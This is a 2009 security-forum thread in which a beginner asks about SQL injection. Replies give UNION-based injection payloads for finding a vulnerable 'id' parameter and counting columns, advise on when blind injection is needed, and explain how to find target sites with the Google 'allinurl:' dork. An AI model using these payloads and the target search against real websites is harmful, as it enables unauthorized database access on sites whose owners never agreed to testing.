 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
when is it suitable to use sql injection or blind sql? |
 |
 Posted: Wed Jul 08, 2009 7:27 pm |
 |
|
| Kroo |
| Regular user |
 |
|
| Joined: Jul 07, 2009 |
| Posts: 5 |
|
|
|
 |
|
 |
|
| Ok i need some information regarding the topic above....still a newbie plzz explain surely help alot.Thanx 4 ur answer. |
|
|
|
|
|
|
|
|
| Posted: Wed Jul 08, 2009 9:14 pm |
|
|
| tehhunter |
| Valuable expert |
|
|
| Joined: Nov 19, 2008 |
| Posts: 261 |
|
|
|
|
|
|
|
If you think you have an exploitable parameter (.php?id=4 for example) then try something like this:
page.php?id=-1'
If you get an error, yes you have an exploitable parameter. Otherwise switch in " or any other characters.
If you got past the last step, try something like
page.php?id=-1' UNION SELECT 1--
page.php?id=-1' UNION SELECT 1,2--
page.php?id=-1' UNION SELECT 1,2,3--
...
page.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9--
You should be seeing an error about the improper number of columns. Keep adding numbers, starting from 1, until that error disappears. Note the largest number you typed.
If the page loads normally, look around for any of the numbers (1,2,3...9). See any? If so, you don't need blind sql injection.
Do you not see any? Then you do.
I won't get into why but use that as a guide. |
|
|
|
|
|
|
|
|
| Posted: Wed Jul 08, 2009 10:21 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| It's easy decision - if there is possibility, then use visual feedback. Even better, if it's able to to multi-row fetch. Blind injection is last resort method. It has bad performance and in case of delay based tricks it can be unreliable, but still - it can do the magic, if implemented correctly. |
|
|
|
|
| Posted: Thu Jul 09, 2009 4:29 am |
|
|
| Kroo |
| Regular user |
|
|
| Joined: Jul 07, 2009 |
| Posts: 5 |
|
|
|
|
|
|
|
| Wow, that explain alot....thanx ur guys. I'll be back with more question. Thanx to tehhunter and warexe too for ur explaination that really reignite my interest. |
|
|
|
|
| Posted: Fri Jul 10, 2009 3:39 am |
|
|
| heaths |
| Beginner |
|
|
| Joined: Jul 10, 2009 |
| Posts: 1 |
| Location: heaths |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Jul 10, 2009 6:10 pm |
|
|
| Kroo |
| Regular user |
|
|
| Joined: Jul 07, 2009 |
| Posts: 5 |
|
|
|
|
|
|
|
| tehhunter wrote: | If you think you have an exploitable parameter (.php?id=4 for example) then try something like this:
page.php?id=-1'
If you get an error, yes you have an exploitable parameter. Otherwise switch in " or any other characters.
If you got past the last step, try something like
page.php?id=-1' UNION SELECT 1--
page.php?id=-1' UNION SELECT 1,2--
page.php?id=-1' UNION SELECT 1,2,3--
...
page.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9--
You should be seeing an error about the improper number of columns. Keep adding numbers, starting from 1, until that error disappears. Note the largest number you typed.
If the page loads normally, look around for any of the numbers (1,2,3...9). See any? If so, you don't need blind sql injection.
Do you not see any? Then you do.
I won't get into why but use that as a guide. |
Yo..tehhunter on the above statement u said something on exploitable parameter right...well i guess the number 4 there is something that u relate to exploitable parameter.
So my question is this how do I find the exploitable parameter if i got a website something like this e.g www.site.com, cause i don't see any number there. |
|
|
|
|
|
|
|
|
| Posted: Fri Jul 10, 2009 6:42 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Jul 10, 2009 8:15 pm |
|
|
| Kroo |
| Regular user |
|
|
| Joined: Jul 07, 2009 |
| Posts: 5 |
|
|
|
|
|
|
|
Goody thanks waraxe u are such a helpful admin...I'm starting to love this forum already. |
|
|
|
|
|
|
|
|
| Posted: Sun Sep 27, 2009 1:48 am |
|
|
| javiercmh |
| Beginner |
|
|
| Joined: Jul 30, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
| Kroo wrote: | | tehhunter wrote: | If you think you have an exploitable parameter (.php?id=4 for example) then try something like this:
page.php?id=-1'
If you get an error, yes you have an exploitable parameter. Otherwise switch in " or any other characters.
If you got past the last step, try something like
page.php?id=-1' UNION SELECT 1--
page.php?id=-1' UNION SELECT 1,2--
page.php?id=-1' UNION SELECT 1,2,3--
...
page.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9--
You should be seeing an error about the improper number of columns. Keep adding numbers, starting from 1, until that error disappears. Note the largest number you typed.
If the page loads normally, look around for any of the numbers (1,2,3...9). See any? If so, you don't need blind sql injection.
Do you not see any? Then you do.
I won't get into why but use that as a guide. |
Yo..tehhunter on the above statement u said something on exploitable parameter right...well i guess the number 4 there is something that u relate to exploitable parameter.
So my question is this how do I find the exploitable parameter if i got a website something like this e.g www.site.com, cause i don't see any number there. |
Hi,
In your example, (www.site.com) there's no number, because you aren't looking for it. To find those numbers, you have to look for them using a search engine. I prefer Google because it has a very useful command:
'allinurl:' (with no '') all you have to do, following the example you quoted, is to search: "allinurl:something.php?id=4" .
The allinurl command is used for searching content in URLs of any webpage. Then we have a special word, that is «something» in this case. You have to be creative and write the word you think will return a lot of results (like news, noticia, article, etc). Finally we have .php?id=4 (any number), this means that we will find pages in php, and with a modifier id=NUMBER. In this NUMBER you also have to use your imagination and choose the number you think is the best for your interests.
I hope that helps, sorry for my spelling (maybe grammar), WYNH (formally javiercmh)  |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
